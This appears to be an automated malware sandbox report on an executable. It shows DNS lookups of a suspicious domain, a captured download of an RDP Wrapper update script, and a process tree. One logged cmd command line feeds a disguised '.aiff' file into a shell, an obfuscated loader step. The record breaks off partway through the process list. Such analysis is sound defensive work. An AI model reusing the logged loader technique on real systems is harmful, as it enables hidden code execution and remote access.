Dec 27, 2024 08:20:24.414854050 CET	61767	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:20:24.553641081 CET	53	61767	1.1.1.1	192.168.2.4
Dec 27, 2024 08:20:29.210756063 CET	54017	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:20:29.347620010 CET	53	54017	1.1.1.1	192.168.2.4
Dec 27, 2024 08:20:34.132715940 CET	51818	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:20:34.269666910 CET	53	51818	1.1.1.1	192.168.2.4
Dec 27, 2024 08:20:39.066205978 CET	56292	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:20:39.430558920 CET	53	56292	1.1.1.1	192.168.2.4
Dec 27, 2024 08:20:44.037590981 CET	54149	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:20:44.177156925 CET	53	54149	1.1.1.1	192.168.2.4
Dec 27, 2024 08:20:45.367630005 CET	65157	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:20:45.504179001 CET	53	65157	1.1.1.1	192.168.2.4
Dec 27, 2024 08:20:49.034518957 CET	57276	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:20:49.171135902 CET	53	57276	1.1.1.1	192.168.2.4
Dec 27, 2024 08:20:54.034671068 CET	52237	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:20:54.171375990 CET	53	52237	1.1.1.1	192.168.2.4
Dec 27, 2024 08:20:59.049788952 CET	56861	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:20:59.186566114 CET	53	56861	1.1.1.1	192.168.2.4
Dec 27, 2024 08:21:04.040009975 CET	53258	53	192.168.2.4	1.1.1.1
Dec 27, 2024 08:21:04.177865028 CET	53	53258	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 27, 2024 08:19:00.835079908 CET	192.168.2.4	1.1.1.1	0x4d1e	Standard query (0)	QPFIkBuKoDrrKMiLWzroGJvlan.QPFIkBuKoDrrKMiLWzroGJvlan	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:01.256851912 CET	192.168.2.4	1.1.1.1	0x548e	Standard query (0)	lYvskCQZEcQueZ.lYvskCQZEcQueZ	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:02.341590881 CET	192.168.2.4	1.1.1.1	0xafc8	Standard query (0)	bDbFlwFKtaJzIIkBijTv.bDbFlwFKtaJzIIkBijTv	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:34.104444981 CET	192.168.2.4	1.1.1.1	0xff5e	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:39.676008940 CET	192.168.2.4	1.1.1.1	0x8723	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:44.938751936 CET	192.168.2.4	1.1.1.1	0x4756	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:49.160197020 CET	192.168.2.4	1.1.1.1	0x9f62	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:54.379676104 CET	192.168.2.4	1.1.1.1	0x874a	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:59.582422972 CET	192.168.2.4	1.1.1.1	0x987d	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:04.832355022 CET	192.168.2.4	1.1.1.1	0x51b5	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:09.963854074 CET	192.168.2.4	1.1.1.1	0xd7f7	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:14.394876957 CET	192.168.2.4	1.1.1.1	0x85c	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:19.442203045 CET	192.168.2.4	1.1.1.1	0x89be	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:24.414854050 CET	192.168.2.4	1.1.1.1	0x767	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:29.210756063 CET	192.168.2.4	1.1.1.1	0xd7f8	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:34.132715940 CET	192.168.2.4	1.1.1.1	0xd80b	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:39.066205978 CET	192.168.2.4	1.1.1.1	0xd5b4	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:44.037590981 CET	192.168.2.4	1.1.1.1	0x9f3d	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:45.367630005 CET	192.168.2.4	1.1.1.1	0x48b4	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:49.034518957 CET	192.168.2.4	1.1.1.1	0x107d	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:54.034671068 CET	192.168.2.4	1.1.1.1	0xefa1	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:59.049788952 CET	192.168.2.4	1.1.1.1	0x4f9f	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:21:04.040009975 CET	192.168.2.4	1.1.1.1	0xc4c3	Standard query (0)	21jhss.club	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 27, 2024 08:19:01.055994987 CET	1.1.1.1	192.168.2.4	0x4d1e	Name error (3)	QPFIkBuKoDrrKMiLWzroGJvlan.QPFIkBuKoDrrKMiLWzroGJvlan	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:01.483133078 CET	1.1.1.1	192.168.2.4	0x548e	Name error (3)	lYvskCQZEcQueZ.lYvskCQZEcQueZ	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:02.566025019 CET	1.1.1.1	192.168.2.4	0xafc8	Name error (3)	bDbFlwFKtaJzIIkBijTv.bDbFlwFKtaJzIIkBijTv	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:34.320914030 CET	1.1.1.1	192.168.2.4	0xff5e	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:39.815160036 CET	1.1.1.1	192.168.2.4	0x8723	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:45.076601028 CET	1.1.1.1	192.168.2.4	0x4756	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:49.302920103 CET	1.1.1.1	192.168.2.4	0x9f62	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:54.516683102 CET	1.1.1.1	192.168.2.4	0x874a	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:19:59.720005989 CET	1.1.1.1	192.168.2.4	0x987d	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:04.969499111 CET	1.1.1.1	192.168.2.4	0x51b5	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:10.101816893 CET	1.1.1.1	192.168.2.4	0xd7f7	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:14.531977892 CET	1.1.1.1	192.168.2.4	0x85c	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:19.580393076 CET	1.1.1.1	192.168.2.4	0x89be	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:24.553641081 CET	1.1.1.1	192.168.2.4	0x767	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:29.347620010 CET	1.1.1.1	192.168.2.4	0xd7f8	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:34.269666910 CET	1.1.1.1	192.168.2.4	0xd80b	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:39.430558920 CET	1.1.1.1	192.168.2.4	0xd5b4	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:44.177156925 CET	1.1.1.1	192.168.2.4	0x9f3d	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:45.504179001 CET	1.1.1.1	192.168.2.4	0x48b4	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:45.504179001 CET	1.1.1.1	192.168.2.4	0x48b4	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:45.504179001 CET	1.1.1.1	192.168.2.4	0x48b4	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:45.504179001 CET	1.1.1.1	192.168.2.4	0x48b4	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:49.171135902 CET	1.1.1.1	192.168.2.4	0x107d	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:54.171375990 CET	1.1.1.1	192.168.2.4	0xefa1	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:20:59.186566114 CET	1.1.1.1	192.168.2.4	0x4f9f	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false
Dec 27, 2024 08:21:04.177865028 CET	1.1.1.1	192.168.2.4	0xc4c3	Name error (3)	21jhss.club	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

raw.githubusercontent.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49842	185.199.111.133	443	6972	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:20:47 UTC	224	OUT	GET /asmtron/rdpwrap/master/bin/autoupdate.bat HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-CH User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: raw.githubusercontent.com
2024-12-27 07:20:47 UTC	903	IN	HTTP/1.1 200 OK Connection: close Content-Length: 17946 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "34ddb13dc81c9df2a5823b82969257c4f430ce21f776bd4cd73465e379057067" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: B89A:197A7A:12F68CF:1573134:676E554F Accept-Ranges: bytes Date: Fri, 27 Dec 2024 07:20:47 GMT Via: 1.1 varnish X-Served-By: cache-ewr-kewr1740043-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1735284047.256789,VS0,VE54 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: 36e31271af1b9ce32e209ef1858d6ad583ea1b2f Expires: Fri, 27 Dec 2024 07:25:47 GMT Source-Age: 0
2024-12-27 07:20:47 UTC	1378	IN	Data Raw: 3c 21 2d 2d 20 3a 20 42 65 67 69 6e 20 6f 66 20 62 61 74 63 68 20 73 63 72 69 70 74 0d 0a 40 65 63 68 6f 20 6f 66 66 0d 0a 73 65 74 4c 6f 63 61 6c 20 45 6e 61 62 6c 65 45 78 74 65 6e 73 69 6f 6e 73 0d 0a 73 65 74 6c 6f 63 61 6c 20 45 6e 61 62 6c 65 44 65 6c 61 79 65 64 45 78 70 61 6e 73 69 6f 6e 0d 0a 3a 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 0d 0a 3a 3a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7c 20 7c 20 20 20 20 20 20 5f 20 20 20 20 20 20 20 20 20 20 7c 20 7c 20 20 20 20 20 20 20 20 20 20 5f 0d 0a 3a 3a 20 20 20 5f 5f 5f 5f 20 5f 20 Data Ascii: ... : Begin of batch script@echo offsetLocal EnableExtensionssetlocal EnableDelayedExpansion:: _ _:: _ \| \| _ \| \| _:: ____ _
2024-12-27 07:20:47 UTC	1378	IN	Data Raw: 65 72 20 61 6e 64 20 61 6c 6c 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7d 0d 0a 3a 3a 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 3a 3a 20 4c 6f 63 61 74 69 6f 6e 20 6f 66 20 6e 65 77 2f 75 70 64 61 74 65 64 20 72 64 70 77 72 61 70 2e 69 6e 69 20 66 69 6c 65 73 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 73 65 74 20 72 64 70 77 72 61 70 5f 69 6e 69 5f 75 70 64 61 74 65 5f 67 69 74 68 75 62 5f 31 3d 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 61 73 6d 74 72 6f 6e 2f 72 64 70 77 72 Data Ascii: er and all other contributors }:::: -----------------------------------------:: Location of new/updated rdpwrap.ini files:: -----------------------------------------set rdpwrap_ini_update_github_1="https://raw.githubusercontent.com/asmtron/rdpwr
2024-12-27 07:20:47 UTC	1378	IN	Data Raw: 72 61 70 2e 64 6c 6c 22 0d 0a 73 65 74 20 72 64 70 77 72 61 70 5f 69 6e 69 3d 22 25 7e 64 70 30 72 64 70 77 72 61 70 2e 69 6e 69 22 0d 0a 73 65 74 20 72 64 70 77 72 61 70 5f 69 6e 69 5f 63 68 65 63 6b 3d 25 72 64 70 77 72 61 70 5f 69 6e 69 25 0d 0a 73 65 74 20 72 64 70 77 72 61 70 5f 6e 65 77 5f 69 6e 69 3d 22 25 7e 64 70 30 72 64 70 77 72 61 70 5f 6e 65 77 2e 69 6e 69 22 0d 0a 73 65 74 20 67 69 74 68 75 62 5f 6c 6f 63 61 74 69 6f 6e 3d 31 0d 0a 73 65 74 20 72 65 74 72 79 5f 6e 65 74 77 6f 72 6b 5f 63 68 65 63 6b 3d 30 0d 0a 73 65 74 20 76 65 72 73 69 6f 6e 5f 63 68 65 63 6b 3d 30 0d 0a 73 65 74 20 75 70 64 61 74 65 64 3d 30 0d 0a 3a 3a 0d 0a 65 63 68 6f 20 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f Data Ascii: rap.dll"set rdpwrap_ini="%~dp0rdpwrap.ini"set rdpwrap_ini_check=%rdpwrap_ini%set rdpwrap_new_ini="%~dp0rdpwrap_new.ini"set github_location=1set retry_network_check=0set version_check=0set updated=0::echo _________________________________
2024-12-27 07:20:47 UTC	1378	IN	Data Raw: 2f 79 20 25 61 75 74 6f 75 70 64 61 74 65 5f 6e 65 77 5f 62 61 74 25 20 25 61 75 74 6f 75 70 64 61 74 65 5f 62 61 74 25 0d 0a 29 20 65 6c 73 65 20 28 0d 0a 20 20 20 20 69 66 20 65 78 69 73 74 20 25 61 75 74 6f 75 70 64 61 74 65 5f 6e 65 77 5f 62 61 74 25 20 64 65 6c 20 25 61 75 74 6f 75 70 64 61 74 65 5f 6e 65 77 5f 62 61 74 25 0d 0a 20 20 20 20 69 66 20 2f 69 20 6e 6f 74 20 22 25 7e 31 22 3d 3d 22 22 20 28 0d 0a 20 20 20 20 20 20 20 20 65 63 68 6f 20 5b 78 5d 20 55 6e 6b 6e 6f 77 6e 20 61 72 67 75 6d 65 6e 74 20 73 70 65 63 69 66 69 65 64 3a 20 22 25 7e 31 22 0d 0a 20 20 20 20 20 20 20 20 65 63 68 6f 20 5b 2a 5d 20 53 75 70 70 6f 72 74 65 64 20 61 72 67 6d 65 6e 74 73 2f 6f 70 74 69 6f 6e 73 20 61 72 65 3a 0d 0a 20 20 20 20 20 20 20 20 65 63 68 6f 20 20 Data Ascii: /y %autoupdate_new_bat% %autoupdate_bat%) else ( if exist %autoupdate_new_bat% del %autoupdate_new_bat% if /i not "%~1"=="" ( echo [x] Unknown argument specified: "%~1" echo [*] Supported argments/options are: echo
2024-12-27 07:20:47 UTC	1378	IN	Data Raw: 22 52 55 4e 4e 49 4e 47 22 20 3e 6e 75 6c 26 26 28 0d 0a 20 20 20 20 65 63 68 6f 20 5b 2d 5d 20 54 65 72 6d 53 65 72 76 69 63 65 20 4e 4f 54 20 72 75 6e 6e 69 6e 67 5e 5e 21 0d 0a 20 20 20 20 63 61 6c 6c 20 3a 69 6e 73 74 61 6c 6c 0d 0a 29 7c 7c 28 0d 0a 20 20 20 20 65 63 68 6f 20 5b 2b 5d 20 54 65 72 6d 53 65 72 76 69 63 65 20 72 75 6e 6e 69 6e 67 2e 0d 0a 29 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 3a 3a 20 32 29 20 63 68 65 63 6b 20 69 66 20 6c 69 73 74 65 6e 65 72 20 73 65 73 73 69 6f 6e 20 72 64 70 2d 74 63 70 20 65 78 69 73 74 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d Data Ascii: "RUNNING" >nul&&( echo [-] TermService NOT running^^! call :install)\|\|( echo [+] TermService running.):: ------------------------------------------:: 2) check if listener session rdp-tcp exist:: -----------------------------------
2024-12-27 07:20:47 UTC	1378	IN	Data Raw: 28 0d 0a 20 20 20 20 65 63 68 6f 20 5b 2d 5d 20 4e 4f 54 20 66 6f 75 6e 64 20 77 69 6e 64 6f 77 73 20 72 65 67 69 73 74 72 79 20 65 6e 74 72 79 20 66 6f 72 20 22 72 64 70 77 72 61 70 2e 64 6c 6c 22 5e 5e 21 0d 0a 20 20 20 20 69 66 20 25 72 64 70 77 72 61 70 5f 69 6e 73 74 61 6c 6c 65 64 25 3d 3d 22 30 22 20 28 0d 0a 20 20 20 20 20 20 20 20 63 61 6c 6c 20 3a 69 6e 73 74 61 6c 6c 0d 0a 20 20 20 20 29 0d 0a 29 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 3a 3a 20 34 29 20 63 68 65 63 6b 20 69 66 20 72 64 70 77 72 61 70 2e 64 6c 6c 20 66 69 6c 65 20 65 78 69 73 74 73 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d Data Ascii: ( echo [-] NOT found windows registry entry for "rdpwrap.dll"^^! if %rdpwrap_installed%=="0" ( call :install )):: -----------------------------------:: 4) check if rdpwrap.dll file exists:: ---------------------------------
2024-12-27 07:20:47 UTC	1378	IN	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 3a 3a 20 37 29 20 63 68 65 63 6b 20 69 66 20 69 6e 73 74 61 6c 6c 65 64 20 66 69 6c 65 20 76 65 72 73 69 6f 6e 20 69 73 20 64 69 66 66 65 72 65 6e 74 20 74 6f 20 74 68 65 20 6c 61 73 74 20 73 61 76 65 64 20 66 69 6c 65 20 76 65 72 73 69 6f 6e 20 69 6e 20 72 65 67 69 73 74 72 79 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 65 63 68 6f 20 5b 2a 5d 20 52 65 61 64 20 6c 61 73 74 20 22 74 65 72 6d 73 72 76 2e 64 6c 6c 22 20 76 65 72 73 69 6f 6e 20 66 72 6f 6d 20 74 68 65 20 77 Data Ascii: ------------:: 7) check if installed file version is different to the last saved file version in registry:: ------------------------------------------------------------------------------------------echo [*] Read last "termsrv.dll" version from the w
2024-12-27 07:20:47 UTC	1378	IN	Data Raw: 64 6c 6c 5f 76 65 72 25 5d 22 20 25 72 64 70 77 72 61 70 5f 69 6e 69 5f 63 68 65 63 6b 25 20 3e 6e 75 6c 26 26 28 0d 0a 20 20 20 20 20 20 20 20 65 63 68 6f 20 5b 2b 5d 20 46 6f 75 6e 64 20 22 74 65 72 6d 73 72 76 2e 64 6c 6c 22 20 76 65 72 73 69 6f 6e 20 65 6e 74 72 79 20 5b 25 74 65 72 6d 73 72 76 5f 64 6c 6c 5f 76 65 72 25 5d 20 69 6e 20 66 69 6c 65 20 25 72 64 70 77 72 61 70 5f 69 6e 69 5f 63 68 65 63 6b 25 2e 0d 0a 20 20 20 20 20 20 20 20 65 63 68 6f 20 5b 2a 5d 20 52 44 50 20 57 72 61 70 70 65 72 20 73 65 65 6d 73 20 74 6f 20 62 65 20 75 70 2d 74 6f 2d 64 61 74 65 20 61 6e 64 20 77 6f 72 6b 69 6e 67 2e 2e 2e 0d 0a 20 20 20 20 29 7c 7c 28 0d 0a 20 20 20 20 20 20 20 20 65 63 68 6f 20 5b 2d 5d 20 4e 4f 54 20 66 6f 75 6e 64 20 22 74 65 72 6d 73 72 76 2e Data Ascii: dll_ver%]" %rdpwrap_ini_check% >nul&&( echo [+] Found "termsrv.dll" version entry [%termsrv_dll_ver%] in file %rdpwrap_ini_check%. echo [*] RDP Wrapper seems to be up-to-date and working... )\|\|( echo [-] NOT found "termsrv.
2024-12-27 07:20:47 UTC	1378	IN	Data Raw: 0d 0a 29 0d 0a 73 65 74 20 72 64 70 77 72 61 70 5f 69 6e 73 74 61 6c 6c 65 64 3d 22 31 22 0d 0a 25 52 44 50 57 49 6e 73 74 5f 65 78 65 25 20 2d 75 0d 0a 25 52 44 50 57 49 6e 73 74 5f 65 78 65 25 20 2d 69 20 2d 6f 0d 0a 63 61 6c 6c 20 3a 73 65 74 4e 4c 41 0d 0a 67 6f 74 6f 20 3a 65 6f 66 0d 0a 3a 3a 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 3a 3a 20 52 65 73 74 61 72 74 20 52 44 50 20 57 72 61 70 70 65 72 0d 0a 3a 3a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 3a 72 65 73 74 61 72 74 0d 0a 65 63 68 6f 2e 0d 0a 65 63 68 6f 20 5b 2a 5d 20 52 65 73 74 61 72 74 20 52 44 50 20 57 72 61 70 70 65 72 20 77 69 74 68 20 6e 65 77 20 69 6e 69 20 28 75 6e 69 6e 73 74 61 6c 6c 20 61 6e 64 20 72 65 69 6e 73 74 61 Data Ascii: )set rdpwrap_installed="1"%RDPWInst_exe% -u%RDPWInst_exe% -i -ocall :setNLAgoto :eof:::: -------------------:: Restart RDP Wrapper:: -------------------:restartecho.echo [*] Restart RDP Wrapper with new ini (uninstall and reinsta
2024-12-27 07:20:47 UTC	1378	IN	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 3a 63 68 65 63 6b 76 65 72 73 69 6f 6e 0d 0a 69 66 20 25 76 65 72 73 69 6f 6e 5f 63 68 65 63 6b 25 3d 3d 31 20 67 6f 74 6f 20 3a 64 6f 77 6e 6c 6f 61 64 0d 0a 73 65 74 20 76 65 72 73 69 6f 6e 5f 63 68 65 63 6b 3d 31 0d 0a 65 63 68 6f 2e 0d 0a 65 63 68 6f 20 5b 2a 5d 20 67 65 74 20 76 65 72 73 69 6f 6e 20 69 6e 66 6f 20 6f 66 20 61 75 74 6f 75 70 64 61 74 65 2e 62 61 74 20 66 72 6f 6d 20 47 69 74 48 75 62 2e 2e 2e 0d 0a 65 63 68 6f 20 20 20 20 20 2d 5e 3e 20 25 61 75 74 6f 75 70 64 61 74 65 5f 76 65 72 5f 75 72 6c 25 0d 0a 66 6f 72 20 2f 66 20 22 74 6f 6b 65 6e 73 3d 2a 20 75 73 65 62 61 63 6b 71 22 20 25 25 61 20 69 6e 20 28 0d 0a 20 20 Data Ascii: --------------------------------------:checkversionif %version_check%==1 goto :downloadset version_check=1echo.echo [] get version info of autoupdate.bat from GitHub...echo -^> %autoupdate_ver_url%for /f "tokens= usebackq" %%a in (

Target ID:	0
Start time:	02:18:56
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\8lOT1rXZp5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\8lOT1rXZp5.exe"
Imagebase:	0x400000
File size:	4'288'512 bytes
MD5 hash:	34807A743F2D680EEF051852EAEF0B16
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:18:57
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\makecab.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\makecab.exe"
Imagebase:	0x800000
File size:	68'096 bytes
MD5 hash:	00824484BE0BCE2A430D7F43CD9BABA5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:18:57
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:18:57
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c WEHuzypTIfJLQWpZ & HMYPflMZogRtPmKziXCRecxqxWV & rIgSHQwdwGHxUulRaOS & cmd < Adunazione.aiff
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:18:57
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:18:57
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:18:59
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
